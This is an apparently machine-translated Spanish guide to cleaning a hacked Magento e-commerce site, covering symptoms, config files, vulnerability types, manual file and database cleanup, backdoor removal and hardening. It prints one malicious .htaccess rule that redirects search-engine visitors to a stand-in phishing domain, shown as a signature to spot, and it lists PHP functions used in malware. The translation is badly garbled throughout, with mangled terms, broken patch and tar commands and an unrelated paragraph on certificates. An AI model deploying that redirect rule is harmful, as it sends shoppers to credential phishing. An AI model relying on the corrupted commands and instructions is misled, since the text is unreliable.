Si su sitio Magento ha sido atacado o contiene malware, ha llegado al lugar correcto para averiguar cómo limpiar el sitio web de Piratat Magento. Para los comerciantes de comercio electrónico, los sitios web pirateados significan una pérdida de confianza, así como una pérdida de moneda. Los clientes no desean visitar o participar en interacciones comerciales en ningún sitio web pirateado. Si su sitio acepta pagos con tarjeta de crédito, los visitantes del sitio no estarán inclinados a compartir sus datos o credenciales de su tarjeta de crédito. Si los datos se roban y se usan abusivamente, los clientes pueden enviar aplicaciones que pueden enfrentar. Estándar de seguridad de datos estándar en la industria de tarjetas de pago (PCI DSS).
Magento es una plataforma de comercio electrónico de código abierto. Se considera que tiene fuertes características de seguridad y es una plataforma segura y estable. Su tienda Magento siempre debe actualizarse. Compruebe y actualice su sitio Magento hoy en la última versión compatible. Los complementos y extensiones y defectos obsoletos también pueden ser problemáticos. Una vez que haya terminado de revisar los síntomas enumerados a continuación. Los síntomas de la tienda Piratat Magento son:-
Tu página inicial ha sido destruida. Esto podría deberse a ataques de odio o simplemente por diversión.
El anfitrión de su sitio suspende su sitio debido a la actividad maliciosa
Los mejores navegadores en su lista negra/corta su sitio
Cuentas de administrador no autorizadas
Los clientes expresan su preocupación por el uso incorrecto de la información de la tarjeta de crédito
La página de pago muestra un comportamiento sospechoso
Sitio muy lento
Código no autorizado en su sitio web, coloque la ubicación de config .php y.php config.php y env.php son archivos importantes para la instalación de Magento. Es parte de la configuración de implementación de Magento 2 y consiste en configuraciones compartidas, específicas del sistema, instalado por Magento 2.
La configuración de implementación de Magento se divide en App/etc/config.php y app/etc/env.php. Estos documentos esencialmente facilitan la conexión entre el sistema de archivos y la base de datos. Env.php contiene el inicio de sesión en la base de datos. Además, también se puede usar para:
Definición de clave de seguridad.
Especificación del prefijo de la base de datos.
Establezca el idioma predeterminado para el panel de administración.
App/etc/config.php es un archivo automático generado que almacena una lista de módulos, temas y paquetes de lenguaje instalados, así como configuraciones compartidas. No existe en el repositorio/liberación de Magento 2 porque se genera automáticamente.
Comenzando con Magento 2.2, el archivo de aplicación/etc/config.php ya no es una entrada al archivo.gitignore. Esto se hace para promover un mejor desarrollo de software. Index.php Como resultado, los atacantes lo usan para varios ataques, como la vandalización de las tiendas. O a veces, el ransomware podría cifrar todo el contenido del archivo y dejar que index.php necesite un rescate. Cambie el nombre del archivo de índice en index.php.old cuando actualice el sistema. Los archivos contienen información importante que un atacante puede descubrir más tarde utilizando un escáner automático.
.htaccess Los cambios de configuración para Magento se pueden hacer usando files.htaccess. Permite a los usuarios modificar la configuración principal definida en httpd.conf/apache.conf. Las instrucciones proporcionadas en el archivo htaccess se aplican a carpetas y directorios. Además, el archivo.htaccess lo ayuda a cambiar la forma en que se accede al sitio web. Además, .htaccess está disponible para: acceso de bloque a ciertas carpetas almacenadas por Magento.
Cree una redirección para la tienda.
Fuerza HTTPS.
Facilitar algunos ataques de inyección en la tienda.
Bloquee su nombre de usuario enumerando robots.
Bloquee la conexión de imagen rápida.
Forzar automáticamente descargar archivos del almacenamiento.
Cuando este archivo fuerte está roto, un atacante puede usarlo para enviar spam. Los archivos htaccess se pueden inyectar con código malicioso para redirigir a los usuarios. Para aclaraciones adicionales, una de estas firmas de código malicioso se presenta a continuación:
RewriteEngine en
RewriteOptions heredar
RewriteCond %{http_referrer}.*Ask.com.*$ [Nc, o]
RewriteCond %{http_referrer}.*Google.*$ [Nc, o]
Rewritecond %{http_referrer}.*Search.yahoo*$ [NC]
Rewriter.* Http: //phishingdomain.tld/phish.php? T = 3 [r, l] Los usuarios son redirigidos a http: //phishingdomain.tld. Este script puede parecerse al panel de gestión de autenticación original. Los usuarios inesperados pueden transmitir la acreditación al atacante. Esto puede conducir a un hack de gestión de Magento.
Los tipos comunes de ataques en la tienda Magento Magento han lanzado una actualización clave llamada SUPEE-10975 el 28 de noviembre de 2018. Contiene algunas actualizaciones de seguridad importantes sobre vulnerabilidades que pueden conducir a compromisos para el almacenamiento de Magento. Algunos ataques comunes incluyen: la fuerza bruta de la fuerza bruta magento que la fuerza bruta permite que un atacante pruebe múltiples contraseñas hasta que se encuentre la correcta. Se encontró tal vulnerabilidad, llamada ProdSecbug-1589. Esto afecta el código abierto Magento antes de 1.9.4.0 y el comercio de Magento antes de 1.14.4.0. Algunos de estos nodos requieren autenticación del administrador, y un atacante puede adivinar la contraseña del administrador. La ejecución remota de la Magento Magento Community Edition y el código de edición empresarial anterior a 2.0.6 son vulnerables a los errores de RCE. Esta vulnerabilidad permite, en esencia, a un atacante remoto realizar un ataque de inyección con objeción de PHP. Código PHP arbitrario con datos cuidadosamente serializados compilados del carrito de compras.
Esta vulnerabilidad ha sido publicada y se puede usar un módulo de metadatos. Otro defecto que se conoce como ProdSecbug-2159 se encontró en código abierto antes de 1.9.4.0, mientras que Magento comercia antes de 1.14.4.0 y Magento 2.1 antes de 2.1.16, Magento 2.2 antes de 2.2.7. Tiene un CVS3 adicional, la actualización de seguridad SUPEE-10975 contiene varias actualizaciones de seguridad relacionadas con el RCA. Algunas actualizaciones son tan fáciles de usar como los archivos de carga al adjuntar videos (ProdSecbug-2156). La vulnerabilidad XSS de secuencias de comandos de sitios cruzados de Magento es una de las vulnerabilidades más comunes que se encuentran en la web que afecta las tiendas Magento. Uno de estos errores de XSS se llama Odsecbug-2053, que afecta a Magento de código abierto antes de 1.9.4.0 y Magento 2.1 antes de 1.14.4.0, Magento 2.2 antes de 2.1.16. Estas versiones son vulnerables a los ataques XSS a través de plantillas de comunicados de prensa. Un ataque XSS puede permitir a un atacante inducir a un administrador a filtrar las credenciales de conexión de phishing del JavaScript, lo que conduce a un truco de gestión de Magento. Solicitud de falsificación de Magento entre los sitios Ataques CSRF de Magento, prácticamente, usa a los usuarios para ejecutar solicitudes no deseadas en la aplicación web que utilizan. Sin embargo, vale la pena señalar aquí que el atacante solo puede ejecutar la solicitud, y el atacante no puede ver la respuesta, lo que significa que el robo de datos no existe.

Se han descubierto varios errores de CSRF en Magento llamado ProdSecbug-2125, ProdSecbug-2088 y ProdSecbug-2140. Puede conducir a la eliminación: –
Todos los bloques a la vez.
Varios grupos de clientes almacenados actualizando los permisos de Magento.
El mapa del sitio de la tienda Magento. En el último paso, ha recopilado información sobre datos de clientes potencialmente comprometidos, cuentas de usuario, ubicaciones de malware y cargas. En este paso, eliminará el hack de magento y traerá su sitio de comercio electrónico en un estado limpio. Nota:- La mejor manera de identificar un archivo del hacker es comparar la condición actual del sitio con un nuevo archivo de instalación o una copia de seguridad limpia. Cualquier diferencia entre las dos versiones puede ayudarlo a identificar lo que el hacker ha cambiado.
Algunos de estos pasos requieren acceso al servidor web y a la base de datos. Si no le gusta manejar tablas de bases de datos o editar PHP, busque ayuda de un profesional para eliminar por completo el malware Magento. ¿Cómo limpiar el sitio web de Piratat Magento? Si alguna de las páginas de escaneo o diagnóstico anteriores muestra campos o cargas maliciosas, primero puede encontrar estos archivos en el servidor web de Magento. Comparar archivos infectados con buenos archivos conocidos (de fuentes oficiales o seguridad de limpieza de confianza) puede ayudarlo a identificar y eliminar cambios maliciosos. Elimine los archivos de sitio pirateados Cuando su archivo se compara con una buena copia, asegúrese de usar la misma versión del archivo y la extensión base de magento, incluido el parche para cualquier aplicación. Para eliminar manualmente las infecciones de malware de los archivos Magento:
Inicie sesión en su servidor a través de SFTP o SSH.
Cree una copia de seguridad del archivo del sitio antes de hacer cambios.
Busque el archivo para referirse a un dominio malicioso o una carga de diario.
Identifique los archivos modificados recientemente y confirme que son legales. Visite los archivos marcados por Diff durante las verificaciones principales de integridad de archivos.
Restaurar o comparar archivos sospechosos con niños de seguridad limpia o fuentes oficiales.
Elimine cualquier código sospechoso o desconocido del archivo personalizado para verificar si el sitio aún puede ejecutarse después del cambio.
Si no encuentra contenido malicioso, intente buscar en la web cualquier spam, cargas útiles o nombres maliciosos que cumpla en el paso uno. Otro usuario de Magento ya puede saber cómo estas piezas están involucradas en el truco que está tratando de limpiar. Es aconsejable reinstalar todas las extensiones después del pirata para asegurarse de que funcione correctamente y que no haya malware residual. Si tiene temas, componentes, módulos o complementos deshabilitados, le recomendamos que los elimine del servidor web. Eliminar las tablas de base de datos pirateadas Elimine las infecciones de malware de la base de datos Magento y puede conectarse al área de administración y abrir CMSS o secciones de contenido para editar bloques, publicaciones y páginas estáticas en su sitio. Proporciona un cierto acceso para cambiar el contenido de la base de datos y generalmente se encuentra. válido. Un instrumento como el panel de administración de la base de datos (como phpmyadmin) o buscar bases de datos y administradores sustitutos.
Para eliminar manualmente las infecciones de malware de la tabla de base de datos Magento:
Inicie sesión en el panel de gestión de la base de datos.
Haga una copia de seguridad de la base de datos antes de hacer cambios.
Busque contenido sospechoso (por ejemplo, palabras clave de spam, enlaces).
Abra una mesa que contenga contenido sospechoso.
Elimine manualmente cualquier contenido sospechoso para verificar que el sitio aún pueda ejecutarse después del cambio.

Elimine todas las herramientas de acceso a la base de datos que ha cargado.
Puede buscar manualmente en las funciones de PHP maliciosas de la base de datos Magento, como Eval, Base64_Decode, Ginflate, PreG_replace, STR_REPLACE, etc., además, la ubicación más común del malware Magento es la tabla Core_Config_Data. La eliminación manual del código “malicioso” de los archivos en su sitio web puede ser extremadamente peligrosa para la salud de su sitio. Si no está seguro, solicite ayuda a un profesional. Retire las puertas traseras que los hackers ocultos casi siempre se quedan con una ruta de retorno a su sitio si se corrige la vulnerabilidad inicial. La mayoría de las veces, encontramos varias puertas traseras en los sitios de los hackers Magento. La puerta trasera generalmente se encuentra en nuevos archivos llamado cómo se ve el archivo principal oficial de Magento. Los attacles también pueden inyectar puertas traseras y malware en ubicaciones importantes de Magento, como las áreas de sótano. Para verificar las inyecciones en el sótano de Magento:
Inicie sesión en el panel de administración de Magento.
Haga clic en CMS o contenido en el elemento del menú.
Seleccione un bloque o bloque estático en la lista.
Haga clic para abrir la base de los enlaces del sótano.
Ver contenido de malware.
Retire la puerta trasera comparando archivos Magento:
Confirme la versión Magento en la esquina inferior derecha de la placa.
Descargue la misma versión del archivo probado principal de la comunidad oficial de Magento.
Inicie sesión en su servidor a través de SFTP o SSH
Cree una copia de seguridad del archivo del sitio antes de hacer cambios. Complete su sitio web con una descarga conocida.
Investigue cualquier archivo nuevo en el servidor que no coincida con un archivo bien conocido.
Investigue cualquier archivo que no tenga el mismo tamaño que el archivo normalmente conocido.
Elimine cualquier contenido sospechoso o reemplace el archivo con una copia muy conocida.
Inicie sesión en el panel de administración de Magento.
Haga clic en el sistema en el elemento del menú y seleccione la administración de caché en Herramientas.
Haga clic en Actualización de caché Magento (y actualice el caché en Magento 1.x).
Probar cualquier cambio.
Restablecer la contraseña del usuario debe restablecer todas las contraseñas del usuario con una contraseña única Strong para evitar la infección. Si su versión Magento no se corrige, le recomendamos que corregirá primero su sitio. Si el parche está desactualizado, un atacante puede robar las credenciales del usuario de Magento del backend. Elimine la contraseña de usuario de Magento:
Inicie sesión en su área de administración de Magento.
Haga clic en el sistema en el elemento del menú y seleccione usuarios o todos los usuarios con permiso.
Haga clic en cualquier usuario en la lista.
Ingrese una nueva contraseña de usuario en nuevos campos de contraseña y confirmación de contraseña.
Ingrese su contraseña en el campo Contraseña (si usa Magento 2.x).
Haga clic en Guardar usuarios.
Debe reducir la cantidad de cuentas de usuario con roles de administrador. Esto se expandirá a su cuenta FTP y al sistema de sitio web. Dar a los usuarios solo el acceso que necesitan. Recuerdas advertencias de malware Si aparece en la lista negra de Google, McAfee, Yandex (o cualquier otra agencia de spam web), puede solicitar una revisión después de los remedios de pirateo. Google ahora está limitando la recurrencia de alojamiento/difusión de malware en su sitio web a una solicitud para revisar cada 30 días. ¡Censura! Advertencia en la lista Negra Elimine la advertencia de malware del sitio: llame a su empresa de alojamiento y pídales que cancelen el molino.
Es posible que desee proporcionar más información sobre cómo eliminar el malware.
Complete una solicitud de revisión para cada institución incluida en la lista negra, es decir, la consola de búsqueda de Google, consultor del sitio web de McPhee, administrador web de Yandex.
El proceso de examen puede llevar varios días.
Los pasos para prevenir los ataques en la actualización futura y restablecer la configuración de configuración que no se cotizan y desactualizan es una de las principales causas de la infección y es importante eliminar cualquier extensión que se sabe que sea vulnerable. La contraseña también debe restablecerse para asegurarse de que si el hacker obtiene acceso a sus credenciales, no se infectará nuevamente. Debe actualizar todo el software Magento, incluidos los archivos principales, componentes, plantillas, módulos y complementos. También puede verificar si su extensión tiene vulnerabilidades conocidas utilizando la herramienta gratuita de informes de expertos. Para aplicar correcciones y actualizaciones de Magento:
Asegúrese de tener la última copia de seguridad del sitio web. Acceda a un parche específico para su versión Magento en la página de descarga de Magento.
Cargue el archivo.sh o.patch a su raíz magento.
Si se compila su tienda Magento, deshabilite el compilador en la compilación System> Tools>.
Inicie sesión en su sitio a través de SSH y ejecute el siguiente pedido de coincidencia para aplicarlo a la extensión del archivo de corrección:
sh ejemplo_patch_name_12345.sh
Patch – -p0 Ejemper_patch_name_12345.patch
unzip -o ejemplo_patch_name_12345.zip
Tar -zxf ejemplo_patch_name_12345.zip
Tar.bz2 tar -jxf ejemplo_patch_name_12345.zip
Pruebe el almacenamiento de Magento para confirmar la funcionalidad.
Si lo deshabilita en el paso 4, ejecute el compilador.
Magento tiene un sistema de caché incorporado para restablecer una vez que se limpie el sitio. Restablecer la versión de caché del sitio web de Magento en caché:
Asegúrese de tener la última copia de seguridad del sitio web.
Inicie sesión en el panel de administración de Magento.
Haga clic en el sistema en el elemento del menú y seleccione la administración de caché en Herramientas.
Haga clic en Actualización de caché Magento (y actualice el caché en Magento 1.x).
Configure niños de respaldo de repuesto como la red de seguridad. ¡Ahora su sitio de Magento está limpio y ha tomado algunos pasos importantes posteriores a la espalda para hacer una copia de seguridad! Tener una buena estrategia de reserva es el corazón de una buena posición de seguridad. Aquí hay algunos consejos para ayudarlo a hacer niños de repuesto para su sitio: la ubicación almacene la copia de seguridad Magento en una ubicación fuera de la ubicación. No almacene a los niños de seguridad (o versiones anteriores) en su servidor; Podrían romperse y solían dañar su sitio real. Idealmente, las soluciones de reserva deben ejecutarse automáticamente a una frecuencia adecuada para las necesidades de su sitio. Redundante El certificado EV requiere documentos adicionales de la autoridad de certificación para validar la organización. Los visitantes verán el nombre de la compañía en la barra de direcciones (además del clic en el icono de bloqueo). Prueba de evidencia El proceso de recuperación para confirmar que su sitio está funcionando. Tipo de archivo Algunas soluciones de copia de seguridad excluyen ciertos tipos de archivos, como videos y archivos. Escanee su computadora Permitir que todos los usuarios de Magento ejecuten escaneos antivirus de renombre en sus sistemas operativos. Si un usuario con una computadora infectada tiene acceso al tablero, entonces Magento puede verse comprometido. Algunas infecciones están diseñadas para moverse de una computadora a un editor de texto o un cliente FTP. Estos son algunos de nuestros programas antivirus recomendados: pagar
Defensores de bit, Kaspersky, Sawforth, F Safety.
Gratis
Malware, Avast, Microsoft Security Points, Avila.
El firewall para el sitio web puede fortalecer su sitio Magento limitando los permisos de archivo y utilizando las reglas de personalización .htaccess. También puede deshabilitar el programa de descarga y cambiar la URL administrativa de back-end y tomar medidas para evitar el caché y otras vulnerabilidades de implementación. Le recomendamos que consulte las mejores prácticas oficiales de seguridad de Magento para obtener más información. Esto se puede hacer utilizando el certificado SSL para verificar su negocio y cifrar todos los datos de transmisión de clientes, incluidas las páginas de inicio de sesión y las páginas de pago. Esto también facilita la detección de scripts e inyecciones IRFRAM utilizando el protocolo HTTP, ya que esto causa advertencias de contenido mixto en su sitio Magento se convierte en un objetivo más grande para los piratas informáticos. Fuente más madura para tiendas web. Incluso si su pago se procesa fuera del sitio, debe considerar seriamente el firewall del sitio web. Área de gestión para usuarios no autorizados. Trate de mantenerse al día con el desafío de gestión. El firewall del sitio web se ha inventado para proporcionar un sistema de defensa periférica alrededor de su sitio. Ventajas de usar un firewall de sitio: prevenir la piratería
Seguridad virtual
Bloquear ataques de fuerza bruta
Reducir los ataques DDoS
Optimización del rendimiento
homefinance blog